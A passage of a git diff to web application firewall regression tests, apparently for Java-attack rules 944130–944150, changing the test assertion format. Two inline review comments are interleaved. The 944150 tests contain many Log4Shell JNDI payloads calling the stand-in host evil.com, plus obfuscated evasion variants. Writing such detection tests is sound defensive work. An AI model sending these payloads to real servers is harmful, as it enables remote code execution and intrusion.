data: "{\"java.lang.ProcessBuilder\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 331 desc: "Argument test includes keyword java.lang.reflect" stages: @@ -6382,7 +6712,8 @@ tests: version: "HTTP/1.0" data: "test=java.lang.reflect" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 332 desc: "Argument name includes keyword java.lang.reflect" stages: 
@@ -6401,7 +6732,8 @@ tests: version: "HTTP/1.0" data: "java.lang.reflect=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 333 desc: "Cookie test includes keyword java.lang.reflect" stages: @@ -6421,7 +6753,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 334 desc: "Cookie name includes keyword java.lang.reflect" stages: @@ -6441,7 +6774,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 335 desc: "Request header test includes keyword java.lang.reflect" stages: @@ -6461,7 +6795,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 336 desc: "XML attribute value includes keyword java.lang.reflect" stages: @@ -6480,7 +6815,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 337 desc: "XML element value includes keyword java.lang.reflect" stages: @@ -6499,7 +6835,8 @@ tests: version: "HTTP/1.0" data: "java.lang.reflect" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 338 desc: "Nested XML element value includes keyword java.lang.reflect" stages: @@ -6518,7 +6855,8 @@ tests: version: "HTTP/1.0" data: "java.lang.reflect" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 339 desc: "Content-Type text/plain includes keyword java.lang.reflect" stages: @@ -6537,7 +6875,8 @@ tests: version: "HTTP/1.0" data: "test=java.lang.reflect" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 340 desc: "Content-Type application/json arg value includes keyword java.lang.reflect" stages: 
@@ -6556,7 +6895,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.lang.reflect\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 341 desc: "Content-Type application/json arg name includes keyword java.lang.reflect" stages: @@ -6575,7 +6915,8 @@ tests: version: "HTTP/1.0" data: "{\"java.lang.reflect\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 342 desc: "Argument test includes keyword java.lang.Runtime" stages: @@ -6594,7 +6935,8 @@ tests: version: "HTTP/1.0" data: "test=java.lang.Runtime" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 343 desc: "Argument name includes keyword java.lang.Runtime" stages: @@ -6613,7 +6955,8 @@ tests: version: "HTTP/1.0" data: "java.lang.Runtime=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 344 desc: "Cookie test includes keyword java.lang.Runtime" stages: @@ -6633,7 +6976,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 345 desc: "Cookie name includes keyword java.lang.Runtime" stages: @@ -6653,7 +6997,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 346 desc: "Request header test includes keyword java.lang.Runtime" stages: @@ -6673,7 +7018,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 347 desc: "XML attribute value includes keyword java.lang.Runtime" stages: @@ -6692,7 +7038,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 348 desc: "XML element value includes keyword java.lang.Runtime" stages: 
@@ -6711,7 +7058,8 @@ tests: version: "HTTP/1.0" data: "java.lang.Runtime" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 349 desc: "Nested XML element value includes keyword java.lang.Runtime" stages: @@ -6730,7 +7078,8 @@ tests: version: "HTTP/1.0" data: "java.lang.Runtime" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 350 desc: "Content-Type text/plain includes keyword java.lang.Runtime" stages: @@ -6749,7 +7098,8 @@ tests: version: "HTTP/1.0" data: "test=java.lang.Runtime" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 351 desc: "Content-Type application/json arg value includes keyword java.lang.Runtime" stages: @@ -6768,7 +7118,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.lang.Runtime\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 352 desc: "Content-Type application/json arg name includes keyword java.lang.Runtime" stages: @@ -6787,7 +7138,8 @@ tests: version: "HTTP/1.0" data: "{\"java.lang.Runtime\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 353 desc: "Argument test includes keyword java.lang.String" stages: @@ -6806,7 +7158,8 @@ tests: version: "HTTP/1.0" data: "test=java.lang.String" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 354 desc: "Argument name includes keyword java.lang.String" stages: @@ -6825,7 +7178,8 @@ tests: version: "HTTP/1.0" data: "java.lang.String=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 355 desc: "Cookie test includes keyword java.lang.String" stages: @@ -6845,7 +7199,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 356 desc: "Cookie name includes keyword java.lang.String" stages: 
@@ -6865,7 +7220,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 357 desc: "Request header test includes keyword java.lang.String" stages: @@ -6885,7 +7241,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 358 desc: "XML attribute value includes keyword java.lang.String" stages: @@ -6904,7 +7261,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 359 desc: "XML element value includes keyword java.lang.String" stages: @@ -6923,7 +7281,8 @@ tests: version: "HTTP/1.0" data: "java.lang.String" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 360 desc: "Nested XML element value includes keyword java.lang.String" stages: @@ -6942,7 +7301,8 @@ tests: version: "HTTP/1.0" data: "java.lang.String" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 361 desc: "Content-Type text/plain includes keyword java.lang.String" stages: @@ -6961,7 +7321,8 @@ tests: version: "HTTP/1.0" data: "test=java.lang.String" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 362 desc: "Content-Type application/json arg value includes keyword java.lang.String" stages: @@ -6980,7 +7341,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.lang.String\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 363 desc: "Content-Type application/json arg name includes keyword java.lang.String" stages: @@ -6999,7 +7361,8 @@ tests: version: "HTTP/1.0" data: "{\"java.lang.String\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 364 desc: "Argument test includes keyword java.lang.StringBuilder" stages: 
@@ -7018,7 +7381,8 @@ tests: version: "HTTP/1.0" data: "test=java.lang.StringBuilder" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 365 desc: "Argument name includes keyword java.lang.StringBuilder" stages: @@ -7037,7 +7401,8 @@ tests: version: "HTTP/1.0" data: "java.lang.StringBuilder=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 366 desc: "Cookie test includes keyword java.lang.StringBuilder" stages: @@ -7057,7 +7422,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 367 desc: "Cookie name includes keyword java.lang.StringBuilder" stages: @@ -7077,7 +7443,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 368 desc: "Request header test includes keyword java.lang.StringBuilder" stages: @@ -7097,7 +7464,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 369 desc: "XML attribute value includes keyword java.lang.StringBuilder" stages: @@ -7116,7 +7484,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 370 desc: "XML element value includes keyword java.lang.StringBuilder" stages: @@ -7135,7 +7504,8 @@ tests: version: "HTTP/1.0" data: "java.lang.StringBuilder" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 371 desc: "Nested XML element value includes keyword java.lang.StringBuilder" stages: @@ -7154,7 +7524,8 @@ tests: version: "HTTP/1.0" data: "java.lang.StringBuilder" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 372 desc: "Content-Type text/plain includes keyword java.lang.StringBuilder" stages: 
@@ -7173,7 +7544,8 @@ tests: version: "HTTP/1.0" data: "test=java.lang.StringBuilder" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 373 desc: "Content-Type application/json arg value includes keyword java.lang.StringBuilder" stages: @@ -7192,7 +7564,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.lang.StringBuilder\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 374 desc: "Content-Type application/json arg name includes keyword java.lang.StringBuilder" stages: @@ -7211,7 +7584,8 @@ tests: version: "HTTP/1.0" data: "{\"java.lang.StringBuilder\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 375 desc: "Argument test includes keyword java.lang.System" stages: @@ -7230,7 +7604,8 @@ tests: version: "HTTP/1.0" data: "test=java.lang.System" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 376 desc: "Argument name includes keyword java.lang.System" stages: @@ -7249,7 +7624,8 @@ tests: version: "HTTP/1.0" data: "java.lang.System=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 377 desc: "Cookie test includes keyword java.lang.System" stages: @@ -7269,7 +7645,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 378 desc: "Cookie name includes keyword java.lang.System" stages: @@ -7289,7 +7666,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 379 desc: "Request header test includes keyword java.lang.System" stages: @@ -7309,7 +7687,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 380 desc: "XML attribute value includes keyword java.lang.System" stages: 
@@ -7328,7 +7707,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 381 desc: "XML element value includes keyword java.lang.System" stages: @@ -7347,7 +7727,8 @@ tests: version: "HTTP/1.0" data: "java.lang.System" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 382 desc: "Nested XML element value includes keyword java.lang.System" stages: @@ -7366,7 +7747,8 @@ tests: version: "HTTP/1.0" data: "java.lang.System" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 383 desc: "Content-Type text/plain includes keyword java.lang.System" stages: @@ -7385,7 +7767,8 @@ tests: version: "HTTP/1.0" data: "test=java.lang.System" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 384 desc: "Content-Type application/json arg value includes keyword java.lang.System" stages: @@ -7404,7 +7787,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.lang.System\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 385 desc: "Content-Type application/json arg name includes keyword java.lang.System" stages: @@ -7423,7 +7807,8 @@ tests: version: "HTTP/1.0" data: "{\"java.lang.System\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 386 desc: "Argument test includes keyword javax.script.ScriptEngineManager" stages: @@ -7442,7 +7827,8 @@ tests: version: "HTTP/1.0" data: "test=javax.script.ScriptEngineManager" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 387 desc: "Argument name includes keyword javax.script.ScriptEngineManager" stages: @@ -7461,7 +7847,8 @@ tests: version: "HTTP/1.0" data: "javax.script.ScriptEngineManager=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 388 desc: "Cookie test includes keyword javax.script.ScriptEngineManager" stages: 
@@ -7481,7 +7868,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 389 desc: "Cookie name includes keyword javax.script.ScriptEngineManager" stages: @@ -7501,7 +7889,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 390 desc: "Request header test includes keyword javax.script.ScriptEngineManager" stages: @@ -7521,7 +7910,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 391 desc: "XML attribute value includes keyword javax.script.ScriptEngineManager" stages: @@ -7540,7 +7930,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 392 desc: "XML element value includes keyword javax.script.ScriptEngineManager" stages: @@ -7559,7 +7950,8 @@ tests: version: "HTTP/1.0" data: "javax.script.ScriptEngineManager" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 393 desc: "Nested XML element value includes keyword javax.script.ScriptEngineManager" stages: @@ -7578,7 +7970,8 @@ tests: version: "HTTP/1.0" data: "javax.script.ScriptEngineManager" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 394 desc: "Content-Type text/plain includes keyword javax.script.ScriptEngineManager" stages: @@ -7597,7 +7990,8 @@ tests: version: "HTTP/1.0" data: "test=javax.script.ScriptEngineManager" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 395 desc: "Content-Type application/json arg value includes keyword javax.script.ScriptEngineManager" stages: 
@@ -7616,7 +8010,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"javax.script.ScriptEngineManager\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 396 desc: "Content-Type application/json arg name includes keyword javax.script.ScriptEngineManager" stages: @@ -7635,7 +8030,8 @@ tests: version: "HTTP/1.0" data: "{\"javax.script.ScriptEngineManager\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 397 desc: "Argument test includes keyword org.apache.commons" stages: @@ -7654,7 +8050,8 @@ tests: version: "HTTP/1.0" data: "test=org.apache.commons" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 398 desc: "Argument name includes keyword org.apache.commons" stages: @@ -7673,7 +8070,8 @@ tests: version: "HTTP/1.0" data: "org.apache.commons=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 399 desc: "Cookie test includes keyword org.apache.commons" stages: @@ -7693,7 +8091,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 400 desc: "Cookie name includes keyword org.apache.commons" stages: @@ -7713,7 +8112,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 401 desc: "Request header test includes keyword org.apache.commons" stages: @@ -7733,7 +8133,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 402 desc: "XML attribute value includes keyword org.apache.commons" stages: @@ -7752,7 +8153,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 403 desc: "XML element value includes keyword org.apache.commons" stages: 
@@ -7771,7 +8173,8 @@ tests: version: "HTTP/1.0" data: "org.apache.commons" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 404 desc: "Nested XML element value includes keyword org.apache.commons" stages: @@ -7790,7 +8193,8 @@ tests: version: "HTTP/1.0" data: "org.apache.commons" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 405 desc: "Content-Type text/plain includes keyword org.apache.commons" stages: @@ -7809,7 +8213,8 @@ tests: version: "HTTP/1.0" data: "test=org.apache.commons" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 406 desc: "Content-Type application/json arg value includes keyword org.apache.commons" stages: @@ -7828,7 +8233,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"org.apache.commons\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 407 desc: "Content-Type application/json arg name includes keyword org.apache.commons" stages: @@ -7847,7 +8253,8 @@ tests: version: "HTTP/1.0" data: "{\"org.apache.commons\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 408 desc: "Argument test includes keyword org.omg.CORBA" stages: @@ -7866,7 +8273,8 @@ tests: version: "HTTP/1.0" data: "test=org.omg.CORBA" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 409 desc: "Argument name includes keyword org.omg.CORBA" stages: @@ -7885,7 +8293,8 @@ tests: version: "HTTP/1.0" data: "org.omg.CORBA=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 410 desc: "Cookie test includes keyword org.omg.CORBA" stages: @@ -7905,7 +8314,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 411 desc: "Cookie name includes keyword org.omg.CORBA" stages: 
@@ -7925,7 +8335,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 412 desc: "Request header test includes keyword org.omg.CORBA" stages: @@ -7945,7 +8356,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 413 desc: "XML attribute value includes keyword org.omg.CORBA" stages: @@ -7964,7 +8376,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 414 desc: "XML element value includes keyword org.omg.CORBA" stages: @@ -7983,7 +8396,8 @@ tests: version: "HTTP/1.0" data: "org.omg.CORBA" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 415 desc: "Nested XML element value includes keyword org.omg.CORBA" stages: @@ -8002,7 +8416,8 @@ tests: version: "HTTP/1.0" data: "org.omg.CORBA" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 416 desc: "Content-Type text/plain includes keyword org.omg.CORBA" stages: @@ -8021,7 +8436,8 @@ tests: version: "HTTP/1.0" data: "test=org.omg.CORBA" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 417 desc: "Content-Type application/json arg value includes keyword org.omg.CORBA" stages: @@ -8040,7 +8456,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"org.omg.CORBA\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 418 desc: "Content-Type application/json arg name includes keyword org.omg.CORBA" stages: @@ -8059,4 +8476,5 @@ tests: version: "HTTP/1.0" data: "{\"org.omg.CORBA\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml index e53d52a3d..56e884e21 100644 
--- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml @@ -17,7 +17,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - no_log_contains: id "944140" + log: + no_expect_ids: [944140] - test_id: 2 desc: Java script uploads stages: @@ -33,7 +34,8 @@ tests: uri: "/get/upload1" version: "HTTP/1.1" output: - log_contains: id "944140" + log: + expect_ids: [944140] - test_id: 3 desc: Java script uploads stages: @@ -49,7 +51,8 @@ tests: uri: "/get/upload2" version: "HTTP/1.1" output: - log_contains: id "944140" + log: + expect_ids: [944140] - test_id: 4 desc: Java script uploads stages: @@ -65,7 +68,8 @@ tests: uri: "/get/upload3" version: "HTTP/1.1" output: - log_contains: id "944140" + log: + expect_ids: [944140] - test_id: 5 desc: Java script uploads stages: @@ -81,7 +85,8 @@ tests: uri: "/get/upload4" version: "HTTP/1.1" output: - log_contains: id "944140" + log: + expect_ids: [944140] - test_id: 6 desc: Java script uploads stages: @@ -97,7 +102,8 @@ tests: uri: "/get/upload" version: "HTTP/1.1" output: - log_contains: id "944140" + log: + expect_ids: [944140] - test_id: 7 desc: Java script uploads stages: @@ -113,7 +119,8 @@ tests: uri: "/get/upload" version: "HTTP/1.1" output: - log_contains: id "944140" + log: + expect_ids: [944140] - test_id: 8 desc: Java script uploads stages: @@ -129,7 +136,8 @@ tests: uri: "/get/upload7" version: "HTTP/1.1" output: - log_contains: id "944140" + log: + expect_ids: [944140] - test_id: 9 desc: Java script uploads stages: @@ -145,4 +153,5 @@ tests: uri: "/get/upload8" version: "HTTP/1.1" output: - no_log_contains: id "944140" + log: + no_expect_ids: [944140] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml index 1042f5a4e..4f7e39fdd 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml 
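Review bot: Every test from 2 through 9 in 944140.yaml carries the identical `desc: Java script uploads`, so when one of the new `expect_ids: [944140]` assertions fails, the report will not say which upload variant regressed. The `desc` lines are context this commit leaves unchanged, but since each `output:` block is being rewritten anyway it is a cheap moment to make them distinguishable, e.g. `desc: Java script upload - /get/upload1`. Tests 6 and 7 both use `uri: "/get/upload"`, so whatever separates them presumably lives in the request body or headers outside the hunk; a desc naming that difference would help more than the URI does.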
+++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml @@ -3,7 +3,6 @@ # 944151 should detect the same things as 944150. meta: author: "dune73, Max Leske, azurit" - description: "Description" rule_id: 944150 tests: - test_id: 1 @@ -22,7 +21,8 @@ tests: data: foo=${jndi:ldap://evil.com/webshell} version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 2 desc: Log4J exploit on User-Agent stages: @@ -37,7 +37,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 3 desc: Log4J exploit in XML code stages: @@ -54,7 +55,8 @@ tests: data: version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 4 desc: Log4J exploit in XML code stages: @@ -71,7 +73,8 @@ tests: data: "${jndi:ldap://evil.com/webshell}" version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 5 desc: Log4J exploit on arg foo, with evasion stages: @@ -88,7 +91,8 @@ tests: data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 6 desc: Log4J exploit on arg foo, with evasion stages: @@ -105,7 +109,8 @@ tests: data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 7 desc: Log4J exploit on arg foo, with evasion stages: @@ -122,7 +127,8 @@ tests: data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 8 desc: Log4J exploit on arg foo, with Unicode escape encoding evasion stages: 
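Review bot: In the test 3 hunk (`@@ -54,7 +55,8 @@`) the context shows a bare `data:` immediately followed by `version: "HTTP/1.1"`, which YAML parses as null rather than as an empty request body; for a test described as "Log4J exploit in XML code" that reads as if the XML payload is missing, unless it is carried in a header or the URI above the hunk. If an empty body is intended, `data: ""` states that explicitly; if not, the new `expect_ids: [944150]` would be asserting on a request that may carry no payload. The matching test 3 hunk in 944151.yaml (`@@ -54,7 +55,8 @@`) has the same shape and should be checked together with this one. The `data:` line is context, so it cannot be judged from the changed lines alone.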
@@ -139,7 +145,8 @@ tests: data: foo=$\u007Bjndi:ldap://evil.com/webshell} version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 9 desc: Log4J exploit on JSON with URL encoding evasion stages: @@ -156,7 +163,8 @@ tests: data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 10 desc: Log4J exploit on JSON with Unicode escape evasion, uppercase stages: @@ -173,7 +181,8 @@ tests: data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 11 desc: Log4J exploit on JSON with Unicode escape evasion, lowercase stages: @@ -190,7 +199,8 @@ tests: data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 12 desc: Log4J exploit on JSON with named HTML entity evasion, lower case stages: @@ -207,7 +217,8 @@ tests: data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 13 desc: Log4J exploit on JSON with named HTML entity evasion, upper case stages: @@ -224,7 +235,8 @@ tests: data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 14 desc: Log4J exploit on JSON with numeric HTML entity evasion stages: @@ -241,7 +253,8 @@ tests: data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 15 desc: Log4J exploit on JSON with Unicode escape evasion, wrapped in URL encoding evasion stages: 
@@ -258,7 +271,8 @@ tests: data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 16 desc: Log4J exploit on JSON with URL encoding evasion, wrapped in Unicode escape evasion stages: @@ -275,7 +289,8 @@ tests: data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 17 desc: Log4J exploit on JSON with URL encoding evasion, mixed with Unicode escape evasion stages: @@ -292,7 +307,8 @@ tests: data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 18 desc: Log4J exploit on JSON with named HTML entity evasion wrapped in URL encoding evasion stages: @@ -309,7 +325,8 @@ tests: data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 19 desc: Log4J exploit on JSON with numeric HTML entity evasion wrapped in URL encoding evasion stages: @@ -326,7 +343,8 @@ tests: data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 20 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion stages: @@ -343,7 +361,8 @@ tests: data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 21 desc: Log4J exploit on JSON with numeric HTML entity evasion, wrapped in Unicode escape evasion stages: 
@@ -360,7 +379,8 @@ tests: data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 22 desc: Log4J exploit on JSON with named and numeric HTML entity evasion, mixed with unicode escape evasion and URL encoding evasion stages: @@ -377,7 +397,8 @@ tests: data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 23 desc: Log4J exploit on User-Agent header which is known to work against org.apache.commons:commons-text:1.9 stages: @@ -393,7 +414,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "944150" + log: + expect_ids: [944150] - test_id: 24 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion, omitting terminal semi-colon stages: @@ -410,4 +432,5 @@ tests: data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944150" + 